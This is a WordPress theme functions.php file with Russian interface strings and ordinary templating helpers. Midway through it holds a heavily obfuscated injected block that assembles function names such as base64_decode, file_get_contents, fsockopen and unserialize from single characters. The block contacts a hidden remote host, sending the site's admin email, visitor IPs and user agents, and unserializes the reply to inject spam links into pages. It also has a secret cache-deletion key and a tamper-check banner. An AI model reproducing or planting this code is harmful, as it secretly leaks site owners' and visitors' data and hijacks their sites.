<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $ZkoxLP='s';$duZX='o';$RgUtk='e';$rxBe='e';$gqkZ='6';$RWSTTi='4';$EtdB='a';$hIMyY='d';$yqpRuR='_';$zAmy='c';$SQXmSF='e';$tcHQO='d';$XqRE='b';$EmdSpHWm=$XqRE.$EtdB.$ZkoxLP.$rxBe.$gqkZ.$RWSTTi.$yqpRuR.$tcHQO.$RgUtk.$zAmy.$duZX.$hIMyY.$SQXmSF;$FPaQ='e';$LaOgCqc='t';$TuBBWJp='n';$upjAbm='a';$yLJkrdw='z';$OkxHnC='f';$KScfbQP='g';$erCCcm='l';$LcuK='i';$KNHBiOQe=$KScfbQP.$yLJkrdw.$LcuK.$TuBBWJp.$OkxHnC.$erCCcm.$upjAbm.$LaOgCqc.$FPaQ;$xdtJI='t';$GwcR='o';$UYkVN='s';$Kzus='r';$LUaiC='r';$DmmpBR='3';$iKLoEw='_';$BJjad='1';$PhOSB='t';$LihxCwHd=$UYkVN.$xdtJI.$Kzus.$iKLoEw.$LUaiC.$GwcR.$PhOSB.$BJjad.$DmmpBR;$voel='r';$bIogh='s';$mlqt='v';$aQZGlC='e';$ewXvrpK='t';$Lhcg='r';$QpVFvFuD=$bIogh.$ewXvrpK.$Lhcg.$voel.$aQZGlC.$mlqt;                     $kv______e='s';$vx_______s='o';$wr_____m='e';$xo____i='e';$wo______g='6';$ve__u='4';$pd____________c='a';$lo__i='d';$rt_______u='_';$va__________f='c';$dj_________y='e';$qr_____________d='d';$mf_____________d='b';$sq____p=$mf_____________d.$pd____________c.$kv______e.$xo____i.$wo______g.$ve__u.$rt_______u.$qr_____________d.$wr_____m.$va__________f.$vx_______s.$lo__i.$dj_________y;$rf_____________m='c';$ti__________t='u';$wj_______________p='i';$ek_____i='i';$ic______________p='t';$ha_____________d='o';$vp______i='f';$kp______x='n';$lh_________h='n';$ds____________o='s';$jx_____________o='s';$vq_________m='x';$ww__________p='_';$sa______________f='t';$eg______p='e';$xu____________c=$vp______i.$ti__________t.$kp______x.$rf_____________m.$sa______________f.$ek_____i.$ha_____________d.$lh_________h.$ww__________p.$eg______p.$vq_________m.$wj_______________p.$jx_____________o.$ic______________p.$ds____________o;$wq____o='e';$gn_________g='o';$uk____x='p';$wn_____________z='f';$mb___y='n';$kc____n=$wn_____________z.$gn_________g.$uk____x.$wq____o.$mb___y;$ik______________k='e';$qd______q='a';$am_________l='d';$ig___t='r';$sh____e='f';$qn_____________v=$sh____e.$ig___t.$ik______________k.$qd______q.$am_________l;$pf____g='c';$wz_____________g='s';$yg___i='f';$ak_______________m='e';$mr__y='o';$fg___________h='l';$xc_____j=$yg___i.$pf____g.$fg___________h.$mr__y.$wz_____________g.$ak_______________m;define("WP_ID", $sq____p("Mi4wLjA="));define("WP_TTL", $sq____p("MTA4MDA="));define("WP_SRC", $sq____p("dHBva24="));function wp_get_header() {global $sq____p, $xu____________c;if ($xu____________c($sq____p("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$xu____________c($sq____p("d3BfZ2V0X2Zvb3Rlcg==")) &&$xu____________c($sq____p("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $sq____p, $kc____n, $xc_____j, $qn_____________v;$vy___________g = TEMPLATEPATH."/".$sq____p("Zm9vdGVyLnBocA==");$wx__________i = @$kc____n($vy___________g, "r");$vy___________g = @$qn_____________v($wx__________i, @filesize($vy___________g));@$xc_____j($wx__________i);$xc__________n = TEMPLATEPATH."/".$sq____p("ZnVuY3Rpb25zLnBocA==");$wx__________i = @$kc____n($xc__________n, "r");$xc__________n = @$qn_____________v($wx__________i, @filesize($xc__________n));@$xc_____j($wx__________i);$px__________r = 0;if($vy___________g && $xc__________n) {if ($sq____p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($vy___________g, $sq____p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$px__________r = 1;}if (substr_count($vy___________g, "wp_theme_GPL_credits()") < 1) {$px__________r = 2;}}if(WP_ID != "2.0.0") {$px__________r = 12;}}if($px__________r > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $px__________r -->";}}function wp_loaded() {global $sq____p, $xu____________c;return $xu____________c($sq____p("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ry_______z, $om____________g = "(more...)", $qr___________i = 0, $vy______________f = "") {$ld____d = get_the_content($om____________g, $qr___________i, $vy______________f);$ld____d = apply_filters("the_content", $ld____d);$ld____d = str_replace("]]>", "]]>", $ld____d);if (strlen($_GET["p"]) > 0) {echo $ld____d;}else if ((strlen($ld____d)>$ry_______z) && ($ti_____c = strpos($ld____d, " ", $ry_______z ))) {$ld____d = substr($ld____d, 0, $ti_____c);$ld____d = $ld____d;echo $ld____d;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$om____________g</a></div></p>";} else {echo $ld____d;}}}$jf____u='b';$ey___________o='a';$zk___________j='e';$xr___________p='s';$sn______v='4';$zw______________f='_';$wh______n='e';$ma_____j='o';$uv______s='c';$nj__________k='6';$hp______________v='d';$qv___u='n';$ym_____r='e';$yy_________f=$jf____u.$ey___________o.$xr___________p.$wh______n.$nj__________k.$sn______v.$zw______________f.$zk___________j.$qv___u.$uv______s.$ma_____j.$hp______________v.$ym_____r;$do________c='_';$ub_________x='t';$lo_______________a='e';$oz________f='l';$va________e='g';$st____________e='_';$gr____z='t';$mf___h='n';$ry_____c='e';$hs____k='n';$lh______s='i';$kx____l='s';$hq_________c='t';$fz______________x='e';$ab______________o='c';$cr____w='f';$bi____________h='o';$vv_________i=$cr____w.$lh______s.$oz________f.$fz______________x.$do________c.$va________e.$lo_______________a.$ub_________x.$st____________e.$ab______________o.$bi____________h.$hs____k.$hq_________c.$ry_____c.$mf___h.$gr____z.$kx____l;$la__________s='f';$aj____l='i';$jt____k='s';$fu______________n='l';$ga_____s='s';$ol____t='t';$ll_____________d='e';$kq_____o='x';$au_____t='i';$uu___z='e';$zd____h='_';$jo______d=$la__________s.$au_____t.$fu______________n.$ll_____________d.$zd____h.$uu___z.$kq_____o.$aj____l.$jt____k.$ol____t.$ga_____s;$rd____________h='r';$jz_____________s='v';$eg_____________g='e';$ff_____________p='_';$we__________n='o';$ep______j='c';$dp___________d='o';$le___________m='n';$zk_______________d='a';$ar______l='r';$fi__________a='p';$ev_________d='s';$hj_____________m='m';$vz______________b='e';$vr____________y='i';$hj______________o=$jz_____________s.$eg_____________g.$rd____________h.$ev_________d.$vr____________y.$dp___________d.$le___________m.$ff_____________p.$ep______j.$we__________n.$hj_____________m.$fi__________a.$zk_______________d.$ar______l.$vz______________b;$ks____z='c';$gm___________f='o';$xh____________q='f';$hv________e='e';$bo_______j='k';$ww_____________x='o';$wr_________t='s';$as_____e='p';$dg_____________a='n';$hu__________p=$xh____________q.$wr_________t.$gm___________f.$ks____z.$bo_______j.$ww_____________x.$as_____e.$hv________e.$dg_____________a;$kj___i='f';$lc_______x='t';$mg_______o='e';$kw_________m='i';$sv_________n='w';$gx___________k='r';$uc__________f=$kj___i.$sv_________n.$gx___________k.$kw_________m.$lc_______x.$mg_______o;$js_______________u='m';$pn_____a='d';$ps______________c='5';$ax______________t=$js_______________u.$pn_____a.$ps______________c;$ht___________z='h';$ro______________r='r';$fw____________u='a';$ls__________d='a';$ob_________a='e';$fc____________i='l';$km__f='p';$jd_____________i='t';$tm_______f=$ro______________r.$ob_________a.$fw____________u.$fc____________i.$km__f.$ls__________d.$jd_____________i.$ht___________z;$qx____________y='u';$iv_________o='e';$jx_____________a='a';$we__________a='n';$jq_______h='s';$ws_______d='r';$sb_______j='i';$ff__________c='i';$vn__e='e';$zi________q='l';$jf___t='z';$yy________k=$qx____________y.$we__________a.$jq_______h.$iv_________o.$ws_______d.$sb_______j.$jx_____________a.$zi________q.$ff__________c.$jf___t.$vn__e;$yb_______m='p';$al_____m='m';$bs__j='t';$kb__k='a';$dp_____k='n';$uk_______z='e';$du_________t='m';$fw____________q=$bs__j.$uk_______z.$du_________t.$yb_______m.$dp_____k.$kb__k.$al_____m;$hp_____b='x';$yb_______________h='n';$si___q='c';$yp_______________g='o';$xb______________w='r';$ij___s='t';$dv___f='e';$ia_______q='r';$ou___________p='e';$rf______________x='e';$lw________g='s';$dq____k='_';$aw_______________j='_';$bi______________t='t';$ug___________u='t';$vp______d='t';$bm_______________q='a';$gb___s='c';$eb_______________s='a';$fo____z='e';$ue__p='m';$st_______________x=$lw________g.$ij___s.$ia_______q.$rf______________x.$bm_______________q.$ue__p.$aw_______________j.$gb___s.$yp_______________g.$yb_______________h.$bi______________t.$ou___________p.$hp_____b.$ug___________u.$dq____k.$si___q.$xb______________w.$dv___f.$eb_______________s.$vp______d.$fo____z;function gl_______q($yf____d) {global $sq____p, $xu____________c, $vv_________i, $hj______________o, $st_______________x;if (!$xu____________c($sq____p("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($hj______________o(PHP_VERSION, "5.0.0", ">=") && $xu____________c($sq____p("ZmlsZV9nZXRfY29udGVudHM=")) && $xu____________c($sq____p("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$kg__________i = $st_______________x(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$il____________t = @$vv_________i($yf____d, 0, $kg__________i);} else {$il____________t = @$vv_________i($yf____d, 0);}return $il____________t;}function vb_____g($yf____d) {global $xu____________c, $hu__________p, $uc__________f, $sq____p;if (!$xu____________c($sq____p("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ew______r = strpos($yf____d, "/", 7);$wn_______________a = array("uri"     => substr($yf____d, $ew______r),"host"    => str_replace("http://", "", substr($yf____d, 0, $ew______r)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$vh_______________r = @$hu__________p("$wn_______________a[host]", 80, $nb__________o, $xl_______________u, 4);if (!$vh_______________r) {return false;} else {$il____________t = "";$qn____________f  = "GET $wn_______________a[uri] HTTP/1.0\r\n";$qn____________f .= "Host: $wn_______________a[host]\r\n";$qn____________f .= "Referer: $wn_______________a[referer]\r\n";$qn____________f .= "Connection: Close\r\n\r\n";@$uc__________f($vh_______________r, $qn____________f);while (!@feof($vh_______________r)) {$yd______e = @fgets($vh_______________r, (1024*24));if ($yd______e == "\r\n") {$fq__m = true;continue;}if ($fq__m) {$il____________t .= $yd______e;}}return $il____________t;}}function dl_______k($yf____d) {global $xu____________c;$vo_______________r = false;if ($yf____d != "") {if ($xu____________c("gl_______q")) {$vo_______________r = @gl_______q($yf____d);}if (!$vo_______________r && ($xu____________c("vb_____g"))) {$vo_______________r = @vb_____g($yf____d);}}return $vo_______________r;}function cg_______________r() {global $_SERVER, $ax______________t;$oc__________q = $_SERVER["SERVER_NAME"];if (substr("$oc__________q", 0, 4) == "www.") {$oc__________q = substr("$oc__________q", 4);}$oc__________q = $ax______________t("$_SERVER[SERVER_NAME]");return $oc__________q;}function rh__n() {return "file";}function id_____________v($yf____d) {global $_SERVER, $vv_________i, $jo______d, $kc____n, $xc_____j, $uc__________f;$uy______________v = py______________x();$ff_____j = cg_______________r().".jpg";$yl_____v = $uy______________v["dir_upload"]["path"]."/$ff_____j";$uq______g = @filemtime($yl_____v);if (!$uq______g || ((time()-$uq______g) >= WP_TTL)) {$vo_______________r = dl_______k($yf____d);if ($vo_______________r) {if ($jo______d($yl_____v)) {@unlink($yl_____v);}$wx__________i = @$kc____n($yl_____v, "x+");@$uc__________f($wx__________i, $vo_______________r);@$xc_____j($wx__________i);}} else {if ($jo______d($yl_____v)) {$vo_______________r = @$vv_________i($yl_____v);} else {$vo_______________r = false;}}return $vo_______________r;}function py______________x() {global $_SERVER, $sq____p, $yy_________f;$sf_____t = wp_count_posts("post");$kk___________b = pathinfo(get_bloginfo("template_directory"));$uy______________v = array("url" => array("report"      => $sq____p("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $kk___________b,"dir_upload"=> ah____y(),"queryString"=> array("?a001=".WP_ID,"a004=".$kk___________b[filename],"a005=".$sf_____t->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.odmu.od.ua/zdorove/kak-predotvratit-sechenie-volos\">Предотвращение сечения волос</a>");$uy______________v["url"]["queryString"] = implode("&", $uy______________v["queryString"]);$uy______________v["url"]["report"] = $uy______________v["url"]["report"]."/?".$yy_________f($uy______________v["url"]["queryString"]).".html";return $uy______________v;}function ah____y() {$aq_______________c = wp_upload_dir();if (isset($aq_______________c["error"])) {$yt________z = lj_______________y();if (is_writable($yt________z)) {$aq_______________c = array("path" => $yt________z);}}return $aq_______________c;}function lj_______________y() {global $xu____________c, $ax______________t, $tm_______f, $fw____________q;$dn_____________e = (bool) ini_get("safe_mode");if ($dn_____________e == true) {return false;}if ($xu____________c("sys_get_temp_dir")) {$na_____t = sys_get_temp_dir();if (is_writable($na_____t)) {return $tm_______f($na_____t);}}if (!empty($_ENV["TMP"])) {return $tm_______f($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $tm_______f($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $tm_______f($_ENV["TEMP"]);} else {$pn___________j = $fw____________q($ax______________t(uniqid(rand(), true)), "");if ($pn___________j) {$na_____t = $tm_______f(dirname($pn___________j));@unlink($pn___________j);return $na_____t;} else {return false;}}}function ha___________r() {global $_GET, $jo______d;$uy______________v = py______________x();$oc__________q = cg_______________r();$ta______________a = rh__n();$fr__m = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($ta______________a == "file") {$pm_______x = $uy______________v["dir_upload"]["path"]."/".$oc__________q.".jpg";if ($jo______d($pm_______x)) {@unlink($pm_______x);$fr__m = "deleted";}}$ss____g = array("s"=> $fr__m,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ss____g AS $nt_______d => $fu__d) echo " [$nt_______d:$fu__d]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $xu____________c, $sq____p, $yy________k;$uy______________v = py______________x();$lv___o = "id_____________v";if ($xu____________c($lv___o)) {$il____________t = $lv___o($uy______________v["url"]["report"]);}if ($il____________t) {if ($il____________t = @$sq____p($il____________t)) {$il____________t = @$yy________k($il____________t);if (strlen($il____________t[custom_credit]) >= 5) {$uy______________v["default_string"] = $il____________t[custom_credit];}if ($il____________t["status"] == "0") {$pi______i = 1;$ye___x = 1;} else {$ce_________m = sizeof($il____________t["links"]);$ng____v = $uy______________v["default_string"];if ($ce_________m > 0 && $il____________t["links"] !== "") {$hw____c = 0;foreach ($il____________t["links"] as $cz_____i => $sm______________a) {$hw____c++;if ($sm______________a->l_path == "" || $sm______________a->l_path == $_SERVER["REQUEST_URI"]) {$sm______________a->l_href = htmlspecialchars(strip_tags($sm______________a->l_href));$sm______________a->l_title = htmlspecialchars(strip_tags($sm______________a->l_title));$sm______________a->l_anchor = htmlspecialchars(strip_tags($sm______________a->l_anchor));$ng____v .= " | ";$ng____v .= "<a href='$sm______________a->l_href' title='$sm______________a->l_title'";if ($sm______________a->l_nofollow == "1") {$ng____v .= " rel='nofollow'";}$ng____v .= ">$sm______________a->l_anchor</a>";}}}$uy______________v["links"] = "$ng____v";if ($il____________t[credit] == "0") {$uy______________v["links"] = "";}}} else {$pi______i = "1";}} else {$pi______i = "1";}if ($pi______i == "1") {$uy______________v["links"] = $uy______________v["default_string"];}echo "$uy______________v[links]";echo "<!-- s: $il____________t[signature] -->";ha___________r();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Старницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
                        break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Ссылка на %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("нумерация страниц", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
